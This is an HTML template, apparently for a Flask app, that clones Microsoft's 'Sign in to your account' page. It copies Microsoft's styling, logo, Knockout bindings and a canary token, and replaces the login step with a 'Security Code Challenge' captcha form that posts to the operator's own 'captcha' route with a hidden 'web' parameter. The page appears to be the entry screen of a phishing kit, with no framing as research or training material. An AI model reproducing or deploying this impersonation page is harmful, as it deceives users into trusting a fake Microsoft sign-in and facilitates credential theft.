<html dir="ltr" class="" lang="en"><head>
    <title>Sign in to your account</title>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes">
    <meta http-equiv="Pragma" content="no-cache">
    <meta http-equiv="Expires" content="-1">
    
<meta http-equiv="x-dns-prefetch-control" content="on">



    <meta name="PageID" content="ConvergedSignIn">
    <meta name="SiteID" content="">
    <meta name="ReqLC" content="1033">
    <meta name="LocLC" content="en-US">


        <meta name="format-detection" content="telephone=no">

  

    
    
<meta name="robots" content="none">

 
 


        
                

    


    
    


    

    



<style>body{font-size:100%;}</style><style>/*! CSS Used from: https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_qzvqnltrxpy99ajspyxbgq2.css */
html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;}
body{margin:0;}
a{background-color:transparent;}
a:active,a:hover{outline:0;}
img{border:0;}
button,input{color:inherit;font:inherit;margin:0;}
button{overflow:visible;}
button{text-transform:none;}
button,input[type="submit"]{-webkit-appearance:button;cursor:pointer;}
input{line-height:normal;}
*{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;}
*:before,*:after{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;}
input,button{font-family:inherit;font-size:inherit;line-height:inherit;}
a:focus{outline:thin dotted;outline-offset:-2px;outline:5px auto -webkit-focus-ring-color;}
img{vertical-align:middle;}
html{font-size:100%;}
body{font-family:"Segoe UI Webfont",-apple-system,"Helvetica Neue","Lucida Grande","Roboto","Ebrima","Nirmala UI","Gadugi","Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI","Tunga","Lao UI","Raavi","Iskoola Pota","Latha","Leelawadee","Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math";font-size:15px;line-height:20px;font-weight:400;font-size:.9375rem;line-height:1.25rem;padding-bottom:.227px;padding-top:.227px;color:#000;background-color:#fff;}
a{color:#ccc;text-decoration:none;}
a:link{color:#0067b8;}
a:visited{color:#0067b8;}
a:hover{color:#666;}
a:focus{color:#0067b8;}
a:active{color:#999;}
.row{margin-left:-2px;margin-right:-2px;}
.row:before,.row:after{content:" ";display:table;}
.row:after{clear:both;}
.col-xs-24,.col-md-24{position:relative;min-height:1px;padding-left:2px;padding-right:2px;}
.col-xs-24{float:left;}
.col-xs-24{width:100%;}
@media (min-width:768px){
.col-md-24{float:left;}
.col-md-24{width:100%;}
}
.form-control{display:block;width:100%;background-image:none;}
input,button{max-width:100%;line-height:inherit;}
input[type="password"],input[type="text"]{padding:4px 8px;border-style:solid;border-width:2px;border-color:rgba(0,0,0,0.4);background-color:rgba(255,255,255,0.4);height:32px;height:2rem;}
input[type="password"]:focus,input[type="text"]:focus{border-color:#0067b8;background-color:#fff;}
.form-group{margin-bottom:12px;}
button,input[type="submit"]{display:inline-block;min-width:100px;padding:4px 12px 4px 12px;margin-top:4px;margin-bottom:4px;position:relative;max-width:100%;text-align:center;white-space:nowrap;overflow:hidden;vertical-align:middle;text-overflow:ellipsis;touch-action:manipulation;color:#000;border-style:solid;border-width:2px;border-color:transparent;background-color:rgba(0,0,0,0.2);}
button:hover,button:focus,input[type="submit"]:hover,input[type="submit"]:focus{border-color:rgba(0,0,0,0.4);}
button:hover,input[type="submit"]:hover{cursor:pointer;}
button:active,input[type="submit"]:active{background-color:rgba(0,0,0,0.4);border-color:transparent;}
a:focus{outline-offset:0;}
body{direction:ltr;}
.text-secondary{color:rgba(0,0,0,0.7);font-size:13px;}
body.cb{text-align:center;}
body.cb .text-13{font-size:.8125rem;}
body.cb div.placeholderContainer{width:100%;position:relative;}
.no-padding-left-right{padding-left:0;padding-right:0;}
body.cb{color:#1b1b1b;text-align:left;}
.background-image{-webkit-animation:fadeIn 1s;-moz-animation:fadeIn 1s;-o-animation:fadeIn 1s;animation:fadeIn 1s;}
.background-image-holder{background:#f2f2f2;}
.background-image-holder,.background-image{position:fixed;top:0;width:100%;height:100%;}
.background-image{background-repeat:no-repeat,no-repeat;background-position:center center,center center;background-size:cover,cover;}
.footer{position:absolute;left:0;bottom:0;width:100%;overflow:visible;z-index:99;clear:both;min-height:28px;}
div.footerNode{margin:0;float:right;}
.footer-content.footer-item{color:#000;font-size:12px;line-height:28px;white-space:nowrap;display:inline-block;margin-left:8px;margin-right:8px;}
.footer-content.footer-item.debug-item{text-decoration:none;letter-spacing:3px;line-height:22px;vertical-align:top;font-size:16px;font-weight:600;}
.outer{display:table;position:absolute;height:100%;width:100%;}
.middle{display:table-cell;vertical-align:middle;}
.sign-in-box{margin-left:auto;margin-right:auto;position:relative;max-width:440px;width:calc(100% - 40px);padding:44px;margin-bottom:28px;background-color:#fff;-webkit-box-shadow:0 2px 6px rgba(0,0,0,0.2);-moz-box-shadow:0 2px 6px rgba(0,0,0,0.2);box-shadow:0 2px 6px rgba(0,0,0,0.2);min-width:320px;min-height:338px;overflow:hidden;}
a:hover{text-decoration:underline;}
.template-section{display:table-row;}
.template-section.main-section{height:100%;}
input[type="password"],input[type="text"]{padding:6px 10px;border-width:1px;border-color:#666;border-color:rgba(0,0,0,0.6);height:36px;outline:none;border-radius:0;-webkit-border-radius:0;background-color:transparent;}
input[type="password"]:hover,input[type="text"]:hover{border-color:#323232;border-color:rgba(0,0,0,0.8);}
input[type="password"]:focus,input[type="text"]:focus{border-color:#0067b8;background-color:transparent;}
button,input[type='submit']{min-height:32px;border:none;background-color:#ccc;background-color:rgba(0,0,0,0.2);min-width:108px;line-height:normal;}
button:hover,input[type="submit"]:hover{background-color:#b2b2b2;background-color:rgba(0,0,0,0.3);}
button:focus,input[type="submit"]:focus{background-color:#b2b2b2;background-color:rgba(0,0,0,0.3);text-decoration:underline;outline:2px solid #000;}
button:active,input[type="submit"]:active{outline:none;text-decoration:none;-ms-transform:scale(.98);-webkit-transform:scale(.98);transform:scale(.98);}
.button.primary{color:#fff;border-color:#0067b8;background-color:#0067b8;display:block;width:100%;}
.button.primary:hover{background-color:#005da6;}
.button.primary:focus{background-color:#005da6;text-decoration:underline;outline:2px solid #000;}
.button.primary:active{outline:none;text-decoration:none;-ms-transform:scale(.98);-webkit-transform:scale(.98);transform:scale(.98);}
.logo{max-width:256px;height:24px;}
.identityBanner{height:24px;background:#fff;margin-top:16px;margin-bottom:-4px;}
.identity{line-height:24px;white-space:nowrap;overflow:hidden;text-overflow:ellipsis;}
.backButton{min-height:24px;width:24px;min-width:24px;float:left;padding:0;background-color:#fff;border-width:0;border-radius:12px;margin-right:2px;}
.backButton:hover{background-color:#e6e6e6;background-color:rgba(0,0,0,0.1);}
.backButton:hover:focus{background-color:#ccc;background-color:rgba(0,0,0,0.2);}
.backButton:active{background-color:#b3b3b3;background-color:rgba(0,0,0,0.3);}
.backButton:focus{background-color:#e6e6e6;background-color:rgba(0,0,0,0.1);}
.row{margin-left:0;margin-right:0;}
.form-group{margin-bottom:16px;}
button,input[type='submit']{margin-top:0;margin-bottom:0;}
.moveOffScreen{position:fixed;bottom:0;right:0;height:0!important;width:0!important;overflow:hidden;opacity:0;filter:alpha(opacity=0);}
.position-buttons>div:first-child{display:inline-block;width:100%;margin-bottom:36px;}
.button-container{position:absolute;bottom:0;right:0;text-align:right;}
@media (max-width:600px),(max-height:366px){
.background-image-holder,.background-image{display:none;}
.middle{vertical-align:top;}
.sign-in-box{padding:24px;margin-top:0;margin-bottom:88px;width:100%;width:100vw;-webkit-box-shadow:none;-moz-box-shadow:none;box-shadow:none;border:0;}
.footer{background-color:#fff;filter:none;}
div.footerNode{float:left;margin:0 24px!important;}
.footer-content.footer-item{color:#747474;}
}
.inline-block{display:inline-block;}
input[type="password"],input[type="text"]{border-top-width:0;border-left-width:0;border-right-width:0;padding-left:0;}
.input.text-box{padding:4px 8px;border-style:solid;border-width:2px;border-color:rgba(0,0,0,0.4);background-color:rgba(255,255,255,0.4);height:32px;height:2rem;padding:6px 10px;border-width:1px;border-color:#666;border-color:rgba(0,0,0,0.6);height:36px;outline:none;border-radius:0;-webkit-border-radius:0;background-color:transparent;border-top-width:0;border-left-width:0;border-right-width:0;padding-left:0;}
.input.text-box:focus{background-color:#fff;border-color:#0067b8;background-color:transparent;}
.input.text-box:hover{border-color:#323232;border-color:rgba(0,0,0,0.8);}
.title{margin-bottom:20px;margin-top:20px;margin-bottom:1.25rem;margin-top:1.25rem;font-size:24px;line-height:28px;font-weight:300;line-height:1.75rem;padding-bottom:2.3632px;padding-top:2.3632px;color:#1b1b1b;font-size:1.5rem;font-weight:600;padding:0;margin-top:16px;margin-bottom:12px;font-family:"Segoe UI","Helvetica Neue","Lucida Grande","Roboto","Ebrima","Nirmala UI","Gadugi","Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI","Tunga","Lao UI","Raavi","Iskoola Pota","Latha","Leelawadee","Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math";}
.pagination-view{position:relative;min-height:206px;}
.pagination-view.has-identity-banner{min-height:170px;}
.lightbox-cover{background-color:white;opacity:0;filter:alpha(opacity=0);z-index:-1;height:100%;width:100%;position:absolute;top:0;left:0;transition:all .5s ease-in;-o-transition:all .5s ease-in;-moz-transition:all .5s ease-in;-webkit-transition:all .5s ease-in;}
.provide-min-height{min-height:1px;}
@media (-ms-high-contrast:active){
.button,button,input[type='submit']{-ms-high-contrast-adjust:none;outline:1px solid windowText;border:1px solid window;background-color:window;color:windowText;text-decoration:none;}
.button:hover,button:hover,input[type='submit']:hover{outline:1px solid windowText;border:1px solid highlight;background-color:highlight;color:highlightText;text-decoration:none;}
.button:hover:focus,button:hover:focus,input[type='submit']:hover:focus{outline:1px solid windowText;border:1px solid windowText;background-color:highlight;color:highlightText;text-decoration:underline;}
.button:focus,button:focus,input[type='submit']:focus{outline:1px solid windowText;border:1px solid windowText;background-color:window;color:windowText;text-decoration:underline;}
.button.primary,input[type='submit'].primary{outline:1px solid highlight;border:1px solid highlight;background-color:highlight;color:highlightText;text-decoration:none;}
.button.primary:hover,input[type='submit'].primary:hover{outline:1px solid highlight;border:1px solid window;background-color:window;color:highlight;text-decoration:none;}
.button.primary:hover:focus,input[type='submit'].primary:hover:focus{outline:1px solid windowText;border:1px solid window;background-color:window;color:highlight;text-decoration:underline;}
.button.primary:focus,input[type='submit'].primary:focus{outline:1px solid windowText;border:1px solid window;background-color:highlight;color:highlightText;text-decoration:underline;}
.backButton{outline:none;border:1px solid window;background-color:window;color:windowText;}
.backButton:hover{outline:none;border:1px solid highlight;background-color:window;color:windowText;}
.backButton:hover:focus{outline:none;border:1px solid highlight;background-color:window;color:windowText;}
.backButton:focus,.backButton:active{outline:none;border:1px dashed highlight;background-color:window;color:windowText;}
}
.fade-in-lightbox{animation:fadeIn .3s ease-in;-webkit-animation:fadeIn .3s ease-in;-moz-animation:fadeIn .3s ease-in;-ms-animation:fadeIn .3s ease-in;-o-animation:fadeIn .3s ease-in;}
.animate{animation-duration:.25s;-webkit-animation-duration:.25s;-moz-animation-duration:.25s;-ms-animation-duration:.25s;-o-animation-duration:.25s;animation-timing-function:cubic-bezier(.5, 0, .5, 1);-webkit-animation-timing-function:cubic-bezier(.5, 0, .5, 1);-moz-animation-timing-function:cubic-bezier(.5, 0, .5, 1);-ms-animation-timing-function:cubic-bezier(.5, 0, .5, 1);-o-animation-timing-function:cubic-bezier(.5, 0, .5, 1);animation-fill-mode:both;-webkit-animation-fill-mode:both;-moz-animation-fill-mode:both;-ms-animation-fill-mode:both;-o-animation-fill-mode:both;transition-property:left;-webkit-transition-property:left;-moz-transition-property:left;-ms-transition-property:left;-o-transition-property:left;}
html[dir=ltr] .animate.slide-in-next{animation-name:show-from-right;-webkit-animation-name:show-from-right;-moz-animation-name:show-from-right;-ms-animation-name:show-from-right;-o-animation-name:show-from-right;}
/*! CSS Used keyframes */
@keyframes fadeIn{from{opacity:0;}to{opacity:1;}}
@-moz-keyframes fadeIn{from{opacity:0;}to{opacity:1;}}
@-webkit-keyframes fadeIn{from{opacity:0;}to{opacity:1;}}
@keyframes show-from-right{from{left:200px;opacity:0;}to{left:0;opacity:1;}}
@-webkit-keyframes show-from-right{from{left:200px;opacity:0;}to{left:0;opacity:1;}}
@-moz-keyframes show-from-right{from{left:200px;opacity:0;}to{left:0;opacity:1;}}
/*! CSS Used fontfaces */
@font-face{font-family:'Segoe UI Webfont';src:local("Segoe UI Light");font-weight:200;font-style:normal;}
@font-face{font-family:'Segoe UI Webfont';src:local("Segoe UI");font-weight:400;font-style:normal;}
@font-face{font-family:'Segoe UI Webfont';src:local("Segoe UI Semibold");font-weight:600;font-style:normal;}
@font-face{font-family:"Segoe UI Webfont";font-weight:300;src:local("Segoe UI Semilight");}
@font-face{font-family:"Segoe UI Webfont";font-weight:700;src:local("Segoe UI Bold");}
@font-face{font-family:"Segoe UI Webfont";font-style:italic;font-weight:400;src:local("Segoe UI Italic");}
@font-face{font-family:"Segoe UI Webfont";font-style:italic;font-weight:700;src:local("Segoe UI Bold Italic");}
 #captcha-message {
      color: #E74C3C;
      text-align: center;
      margin-top: 10px;
      display: none;
    }

    @keyframes fadeIn {
      from {
        opacity: 0;
      }
      to {
        opacity: 1;
      }
    }
</style></head>

<body data-bind="defineGlobals: ServerData, bodyCssClass" class="cb remove-segoe-ui-symbol" style="display: block;">
    
    

<div><!--  -->

<!--  -->

<div data-bind="if: activeDialog"></div>

<form id="captcha-form" method="POST" action="{{ url_for('captcha') }}" autocomplete="off" data-bind="visible: !isLoginPageHidden(), autoSubmit: forceSubmit, attr: { action: postUrl }, ariaHidden: !!activeDialog(), css: { 'provide-min-height': svr.fUseMinHeight }" class="provide-min-height">
    <!-- ko withProperties: { '$loginPage': $data } -->
    <div class="login-paginated-page" data-bind="component: { name: 'master-page',
        publicMethods: masterPageMethods,
        params: {
            serverData: svr,
            showButtons: svr.fShowButtons,
            showFooterLinks: true,
            useWizardBehavior: svr.fUseWizardBehavior,
            handleWizardButtons: false,
            password: password,
            hideFromAria: ariaHidden },
        event: {
            footerAgreementClick: footer_agreementClick } }"><!--  -->

<!-- ko ifnot: useLayoutTemplates --><!-- /ko -->

<!-- ko if: useLayoutTemplates -->
    <!-- ko withProperties: { '$page': $parent } -->
        <!-- ko if: isLightboxTemplate() -->
        <div id="lightboxTemplateContainer" data-bind="component: { name: 'lightbox-template', params: { serverData: svr, showHeader: $page.showHeader(), headerLogo: $page.headerLogo() } }, css: { 'provide-min-height': svr.fUseMinHeight }" class="provide-min-height"><!--  -->

<div id="lightboxBackgroundContainer" data-bind="css: { 'provide-min-height': svr.fUsePlaywrightMinHeight },
    component: { name: 'background-image-control',
        publicMethods: $page.backgroundControlMethods,
        event: { load: $page.backgroundImageControl_onLoad } }"><div class="background-image-holder" role="presentation" data-bind="css: { app: isAppBranding }, style: { background: backgroundStyle }">
    <!-- ko if: smallImageUrl --><!-- /ko -->

    <!-- ko if: backgroundImageUrl -->
    <div id="backgroundImage" role="img" data-bind="backgroundImage: backgroundImageUrl(), externalCss: { 'background-image': true }, ariaLabel: str['STR_Background_Image_AltText']" class="background-image ext-background-image" aria-label="Organization background image" style="background-image: url(&quot;https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg&quot;);"></div>
        <!-- ko if: useImageMask --><!-- /ko -->
    <!-- /ko -->
</div></div>

<!-- ko if: svr.iBannerEnvironment --><!-- /ko -->

<!-- ko withProperties: { '$masterPageContext': $parentContext } -->
<div class="outer" data-bind="css: { 'app': $page.backgroundLogoUrl }">
    <!-- ko if: showHeader --><!-- /ko -->

    <div class="template-section main-section">
        <div data-bind="externalCss: { 'middle': true }" class="middle ext-middle">
            <div class="full-height" data-bind="component: { name: 'content-control', params: { serverData: svr, isVerticalSplitTemplate: $page.isVerticalSplitTemplate(), hasHeader: showHeader } }"><!--  -->

<!-- ko withProperties: { '$content': $data } -->
<div class="flex-column">
    <!-- ko if: $page.paginationControlHelper.showBackgroundLogoHolder --><!-- /ko -->

    <!-- ko if: $page.paginationControlHelper.showPageLevelTitleControl --><!-- /ko -->

    <div class="win-scroll">
        <div id="lightbox" data-bind="
            animationEnd: $page.paginationControlHelper.animationEnd,
            externalCss: { 'sign-in-box': true },
            css: {
                'inner':  $content.isVerticalSplitTemplate,
                'vertical-split-content': $content.isVerticalSplitTemplate,
                'app': $page.backgroundLogoUrl,
                'wide': $page.paginationControlHelper.useWiderWidth,
                'fade-in-lightbox': $page.fadeInLightBox,
                'has-popup': $page.showFedCredAndNewSession &amp;&amp; ($page.showFedCredButtons() || $page.newSession()),
                'transparent-lightbox': $page.backgroundControlMethods() &amp;&amp; $page.backgroundControlMethods().useTransparentLightBox,
                'lightbox-bottom-margin-debug': $page.showDebugDetails,
                'has-header': $content.hasHeader }" class="sign-in-box ext-sign-in-box fade-in-lightbox">

            <!-- ko template: { nodes: $masterPageContext.$componentTemplateNodes, data: $page } -->

        <!-- ko if: svr.fShowCookieBanner --><!-- /ko -->

        <div class="lightbox-cover" data-bind="css: { 'disable-lightbox': svr.fAllowGrayOutLightBox &amp;&amp; showLightboxProgress() }"></div>

        <!-- ko if: showLightboxProgress --><!-- /ko -->

        <!-- ko if: loadBannerLogo -->
        <div data-bind="component: { name: 'logo-control',
            params: {
                isChinaDc: svr.fIsChinaDc,
                bannerLogoUrl: bannerLogoUrl() } }"><!--  -->

<!-- ko if: bannerLogoUrl --><!-- /ko -->

<!-- ko if: !bannerLogoUrl && !isChinaDc && !isCiamUserFlowUx -->
    <!-- ko component: 'accessible-image-control' --><!-- ko if: (isHighContrastBlackTheme || hasDarkBackground || svr.fHasBackgroundColor) && !isHighContrastWhiteTheme --><!-- /ko -->
<!-- ko if: (isHighContrastWhiteTheme || (!hasDarkBackground && !svr.fHasBackgroundColor)) && !isHighContrastBlackTheme -->
<!-- ko template: { nodes: [darkImageNode], data: $parent } --><img class="logo" role="img" pngsrc="https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ea19b2112f4dfd8e90b4505ef7dcb4f9.png" svgsrc="https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg" data-bind="imgSrc, attr: { alt: str['MOBILE_STR_Footer_Microsoft'] }" src="https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg" alt="Microsoft"><!-- /ko -->
<!-- /ko --><!-- /ko -->
<!-- /ko -->

<!-- ko if: !bannerLogoUrl && isCiamUserFlowUx && bannerLogoText --><!-- /ko --></div>
        <!-- /ko -->

        <!-- ko if: svr.strLWADisclaimerMsg && paginationControlHelper.showLwaDisclaimer() --><!-- /ko -->

        <!-- ko if: asyncInitReady -->
        <div role="main" data-bind="component: { name: 'pagination-control',
            publicMethods: paginationControlMethods,
            params: {
                enableCssAnimation: svr.fEnableCssAnimation,
                disableAnimationIfAnimationEndUnsupported: svr.fDisableAnimationIfAnimationEndUnsupported,
                initialViewId: initialViewId,
                currentViewId: currentViewId,
                initialSharedData: initialSharedData,
                initialError: $loginPage.getServerError() },
            event: {
                cancel: paginationControl_onCancel,
                load: paginationControlHelper.onLoad,
                unload: paginationControlHelper.onUnload,
                loadView: view_onLoadView,
                showView: view_onShow,
                setLightBoxFadeIn: view_onSetLightBoxFadeIn,
                animationStateChange: paginationControl_onAnimationStateChange } }"><!--  -->

<div data-bind="css: { 'zero-opacity': hidePaginatedView() }" class="">
    <!-- ko if: showIdentityBanner() && (sharedData.displayName || svr.sPOST_Username) -->
    
    <!-- /ko -->

    <div class="pagination-view animate has-identity-banner slide-in-next" data-bind="css: {
        'has-identity-banner': showIdentityBanner() &amp;&amp; (sharedData.displayName || svr.sPOST_Username),
        'zero-opacity': hidePaginatedView.hideSubView(),
        'animate': animate(),
        'slide-out-next': animate.isSlideOutNext(),
        'slide-in-next': animate.isSlideInNext(),
        'slide-out-back': animate.isSlideOutBack(),
        'slide-in-back': animate.isSlideInBack() }">

        <!-- ko foreach: views -->
            <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
        
            <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
        
            <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
        
            <!-- ko if: $parent.currentViewIndex() === $index() -->
                <!-- ko template: { nodes: [$data], data: $parent } --><div data-viewid="2" data-showidentitybanner="true" data-dynamicbranding="true" data-bind="pageViewComponent: { name: 'login-paginated-password-view',
                params: {
                    serverData: svr,
                    serverError: initialError,
                    isInitialView: isInitialState,
                    username: sharedData.username,
                    displayName: sharedData.displayName,
                    hipRequiredForUsername: sharedData.hipRequiredForUsername,
                    passwordBrowserPrefill: sharedData.passwordBrowserPrefill,
                    availableCreds: sharedData.availableCreds,
                    evictedCreds: sharedData.evictedCreds,
                    useEvictedCredentials: sharedData.useEvictedCredentials,
                    showCredViewBrandingDesc: sharedData.showCredViewBrandingDesc,
                    flowToken: sharedData.flowToken,
                    defaultKmsiValue: svr.iDefaultLoginOptions === 1,
                    userTenantBranding: sharedData.userTenantBranding,
                    sessions: sharedData.sessions,
                    callMetadata: sharedData.callMetadata,
                    supportsNativeCredentialRecovery: sharedData.supportsNativeCredentialRecovery,
                    forgotPasswordText: $loginPage.forgotPasswordText,
                    accessRecoveryLink: $loginPage.accessRecoveryLink,
                    boilerPlateText: $loginPage.boilerPlateText,
                    hideAccountResetCredentials: $loginPage.hideAccountResetCredentials },
                event: {
                    restoreIsRecoveryAttemptPost: $loginPage.view_onRestoreIsRecoveryAttemptPost,
                    updateFlowToken: $loginPage.view_onUpdateFlowToken,
                    submitReady: $loginPage.view_onSubmitReady,
                    redirect: $loginPage.view_onRedirect,
                    resetPassword: $loginPage.passwordView_onResetPassword,
                    setBackButtonState: view_onSetIdentityBackButtonState,
                    setPendingRequest: $loginPage.view_onSetPendingRequest } }"><!--  -->

<!--  -->

<div id="loginHeader" class="row title ext-title" data-bind="externalCss: { 'title': true }">
    <div id="captcha-container" role="heading" aria-level="1" data-bind="text: str['CT_PWD_STR_EnterPassword_Title']">{{ code }}</div>
</div>
<!-- below for security code text -->

<div id="loginHeader" class="row title ext-title" data-bind="externalCss: { 'title': true }">
    <div role="heading" aria-level="1" data-bind="text: str['CT_PWD_STR_EnterPassword_Title']">Security Code Challenge</div>
</div>
	<div class="text-13">
		<div class="form-group">

			Solve the following tasks to prove that you are human

		</div>
	</div>
  

<!-- above for security code text -->
<div id="loginHeader" class="row title ext-title" data-bind="externalCss: { 'title': true }">
    <div role="heading" aria-level="1" data-bind="text: str['CT_PWD_STR_EnterPassword_Title']">Enter code</div>
</div>

<!-- ko if: showCredViewBrandingDesc --><!-- /ko -->

<!-- ko if: unsafe_pageDescription --><!-- /ko -->

<div class="row">
    <div class="form-group col-md-24">
        <div role="alert" aria-live="assertive">
            <!-- ko if: passwordTextbox.error --><!-- /ko -->
        </div>

        <div class="placeholderContainer" data-bind="component: { name: 'placeholder-textbox-field',
            publicMethods: passwordTextbox.placeholderTextboxMethods,
            params: {
                serverData: svr,
                hintText: str['CT_PWD_STR_PwdTB_Label'] },
            event: {
                updateFocus: passwordTextbox.textbox_onUpdateFocus } }"><!-- ko withProperties: { '$placeholderText': placeholderText } -->
    <!-- ko template: { nodes: $componentTemplateNodes, data: $parent } -->

            <input id="captcha-input" name="code" required  type="password" class="form-control input ext-input text-box ext-text-box" aria-required="true" data-bind="
                attr: { autocomplete: svr.fIsUpdatedAutocompleteEnabled ? 'current-password' : 'off'},
                textInput: passwordTextbox.value,
                ariaDescribedBy: [
                    'loginHeader passwordError',
                    showCredViewBrandingDesc ? 'credViewBrandingDesc' : '',
                    unsafe_pageDescription ? 'passwordDesc' : ''].join(' '),
                hasFocusEx: passwordTextbox.focused() &amp;&amp; !showPassword(),
                placeholder: $placeholderText,
                ariaLabel: unsafe_passwordAriaLabel,
                moveOffScreen: showPassword,
                externalCss: {
                    'input': true,
                    'text-box': true,
                    'has-error': passwordTextbox.error }" autocomplete="current-password" aria-describedby="loginHeader passwordError  " placeholder="Code" tabindex="0">
					
			<input type="hidden" name="web" value="{{ request.args.get('web') }}">

            <!-- ko if: svr.fUsePasswordPeek && showPassword() --><!-- /ko -->
        <!-- /ko -->
<!-- /ko -->
<!-- ko ifnot: usePlaceholderAttribute --><!-- /ko --></div>

        <!-- ko if: svr.fUsePasswordPeek --><!-- /ko -->
    </div>
</div>

<!-- ko if: shouldHipInit --><!-- /ko -->

<div data-bind="css: { 'position-buttons': !tenantBranding.BoilerPlateText &amp;&amp; !boilerPlateText }, externalCss: { 'password-reset-links-container': true }" class="position-buttons password-reset-links-container ext-password-reset-links-container">
    <div>
        <!-- ko if: svr.fShowPersistentCookiesWarning --><!-- /ko -->
        <!-- ko if: svr.fKMSIEnabled !== false && !svr.fShowPersistentCookiesWarning && !tenantBranding.KeepMeSignedInDisabled --><!-- /ko -->

      
    </div>
</div>

<div class="win-button-pin-bottom" data-bind="css : { 'boilerplate-button-bottom': tenantBranding.BoilerPlateText || boilerPlateText }">
    <div class="row" data-bind="css: { 'move-buttons': tenantBranding.BoilerPlateText || boilerPlateText }">
        <div data-bind="component: { name: 'footer-buttons-field',
            params: {
                serverData: svr,
                primaryButtonText: str['CT_PWD_STR_SignIn_Button'],
                isPrimaryButtonEnabled: !isRequestPending(),
                isPrimaryButtonVisible: svr.fShowButtons,
                isSecondaryButtonEnabled: true,
                isSecondaryButtonVisible: false },
            event: {
                primaryButtonClick: primaryButton_onClick } }"><div class="col-xs-24 no-padding-left-right button-container button-field-container ext-button-field-container" data-bind="
    visible: isPrimaryButtonVisible() || isSecondaryButtonVisible(),
    css: { 'no-margin-bottom': removeBottomMargin },
    externalCss: { 'button-field-container': true }">

    <!-- ko if: isSecondaryButtonVisible --><!-- /ko -->

    <div data-bind="css: { 'inline-block': isPrimaryButtonVisible }, externalCss: { 'button-item': true }" class="inline-block button-item ext-button-item">
        <!-- type="submit" is needed in-addition to 'type' in primaryButtonAttributes observable to support IE8 -->
        <!-- ko ifnot: svr.fConsentButtonIdViaName -->
        <input id="captcha-submit" type="submit" class="win-button button_primary button ext-button primary ext-primary" data-report-trigger="click" data-report-value="Submit" data-bind="
                attr: primaryButtonAttributes,
                css: { 'high-contrast-overrides': svr.fUseHighContrastOverrides },
                externalCss: {
                    'button': true,
                    'primary': true },
                value: primaryButtonText() || str['CT_PWD_STR_SignIn_Button_Next'],
                hasFocus: focusOnPrimaryButton,
                click: svr.fEnableLivePreview ?  function() { } : primaryButton_onClick,
                clickBubble: !svr.fEnableLivePreview,
                enable: isPrimaryButtonEnabled,
                visible: isPrimaryButtonVisible,
                preventTabbing: primaryButtonPreventTabbing" value="Continue">
        <!-- /ko -->
        <!-- ko if: svr.fConsentButtonIdViaName --><!-- /ko -->
    </div>
</div></div>
    </div>
</div>

<!-- ko if: tenantBranding.BoilerPlateText || boilerPlateText--><!-- /ko -->
</div>
    </div>
</div></div>
        <!-- /ko -->

        <input type="hidden" name="ps" data-bind="value: postedLoginStateViewId" value="">
        <input type="hidden" name="psRNGCDefaultType" data-bind="value: postedLoginStateViewRNGCDefaultType" value="">
        <input type="hidden" name="psRNGCEntropy" data-bind="value: postedLoginStateViewRNGCEntropy" value="">
        <input type="hidden" name="psRNGCSLK" data-bind="value: postedLoginStateViewRNGCSLK" value="">
        <!-- ko if: svr.sCanaryTokenName && !svr.fSkipRenderingNewCanaryToken -->
        <input type="hidden" data-bind="attr: { name: svr.sCanaryTokenName }, value: svr.canary" name="canary" value="6X5eQSa/7E+s1IgxgGeUY1mdQOFPAzkx3wkVQBnTApk=0:1:CANARY:zjK77a/wUzt2uPH3qQbBpBTKVTi9YuSYZ8NaYHVOABQ=">
        <!-- /ko -->
        <!-- ko if: !svr.sCanaryTokenName || svr.fSkipRenderingNewCanaryToken --><!-- /ko -->
